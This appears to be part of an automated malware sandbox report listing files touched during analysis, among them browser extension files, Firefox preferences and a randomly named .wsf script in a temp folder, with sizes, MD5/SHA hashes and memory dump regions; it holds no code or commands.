  SHA1: ed43248b1e531b06506f1b2a07effc8558396aa3
  SHA256: 1b4944b69092252da3df29bf60581d53028a91a78240b2e909b34ca6a51d517e
  SHA512: efafa6a87242d1af661bfef7d615807b893497f2d2ad1717681151665dbc1e670dc69cbb19d8b72fdc22f95667eac88b0c70a5e1f0d2fe7d373bed5e3c567928

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\en\messages.json
  Filesize: 150B
  MD5: 33292c7c04ba45e9630bb3d6c5cabf74
  SHA1: 3482eb8038f429ad76340d3b0d6eea6db74e31bd
  SHA256: 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
  SHA512: 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\pt_BR\messages.json
  Filesize: 161B
  MD5: 5c5a1426ff0c1128c1c6b8bc20ca29ac
  SHA1: 0e3540b647b488225c9967ff97afc66319102ccd
  SHA256: 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
  SHA512: 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43JRD5R919C9MEYAZPTV.temp
  Filesize: 7KB
  MD5: 336ff9346b3dd7a8524f8bd56b255b59
  SHA1: ed0871a93f65f2be83401c932d6dced842cf3ceb
  SHA256: 8d3c01de117121b8a44344ded346aa555754d16e592fa5b52003781fc48f1b82
  SHA512: 1a4b7e34947e7facc62706290e39aa83cafff623f26dac53e871cbcd7b29f273d6d0b9a27e2164b606dea12fdd998560d34ed2cb6385049d373eb8cac7eff988

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 870d02d3fdbba6c03629371c363f596e
  SHA1: cc1bc29cb21174c6f22a6947d547f3a6b033f475
  SHA256: d830e94c2d98621fad66cfcbc901a8b728cbd4ee04ec65cb5fd85b5248c62b05
  SHA512: bfd0880d9bec7444f13bf7d4be195977832f8cb1167d01be01f46ece35786f81c9e66d11cda8cafb6af63fd9c60e0044fcac0d560dc3fd78d6306d5c2c0e269b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GE6QBBB5QH8XLU19LB92.temp
  Filesize: 7KB
  MD5: 0e09dbffd9205e87ab4e02977205578a
  SHA1: 070284ad1f4e21ccf8dd818c2c484902fe2000bc
  SHA256: cd588fdd422bb5c62e32be0223c01e209394114196f0e4fe1097c5020bcf55e5
  SHA512: 5f2ff37a03bdf214df43980d56b023412541056c47f55321506d9b0440198ac9b3ea75493e7e6024232b28d98548d5204f0303f389505085d157c40eefe3009f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 967506555ff0733a9fd4a44bffda77bf
  SHA1: 74a9c2a8ce64cb34f336fa0d787aa337356aa999
  SHA256: f36bbc3e818c2390dc1a29a03eaf6289d02ce081f5818ab36beb45521e3e0306
  SHA512: 4a62a1877c100bdcbc061656aeaee37fda48a54de74e3cfd440984d67db7c740229ea257d7783b54d1c5a79369cfa9698176b2cef234feff24c3b65c0ebf2259

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.js
  Filesize: 6KB
  MD5: fcd2fbb0957b3e8a63d48d508a9cccfd
  SHA1: 486bf982500df507e264f3f89f043e53d55621f4
  SHA256: 56e35eda4a1338a9e18931fb34ddf0753935cb6c193c86286d09fe3465567e96
  SHA512: 8baa29334b64bdd66b298d9e4a53c84db05e70d1cacdf984c9a1c3412ea4b969f7c2a3e47fb1dfc61753cdff85d59ec109d77485f7bb30d8c55222d9d0d6a0e0

C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf
  Filesize: 9KB
  MD5: 68a8bdc9d9f09ff06ba1eac18457c0c7
  SHA1: 659af8fef29016caa8cb74a317d6eb66e7e44269
  SHA256: 886c60b61f2b8847420eef4d7090e9a07acd5a2c0bed51427f6db5b04cfbe616
  SHA512: b92c8e46a85cc4dfe01269350f84168af46b14af671faad8e79bc98c1ea2b4914d89475741df1904dba30b63ecd8b219577e30485a104565e6a385e9f0e40852

\??\PIPE\srvsvc
  (no filesize recorded; the four digests below are the hashes of zero-length input, so no pipe content was captured)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1196-39-0x000000001B7A0000-0x000000001BA82000-memory.dmp
  Filesize: 2.9MB

memory/1628-12-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
  Filesize: 32KB

memory/1628-11-0x000000001B580000-0x000000001B862000-memory.dmp
  Filesize: 2.9MB

memory/1684-22-0x000000001B830000-0x000000001BB12000-memory.dmp
  Filesize: 2.9MB

memory/1684-23-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
  Filesize: 32KB

memory/2780-2-0x0000000010000000-0x00000000105D3000-memory.dmp
  Filesize: 5.8MB

memory/2780-88-0x0000000004060000-0x00000000040C5000-memory.dmp
  Filesize: 404KB

memory/2780-51-0x0000000003A70000-0x0000000003AF5000-memory.dmp
  Filesize: 532KB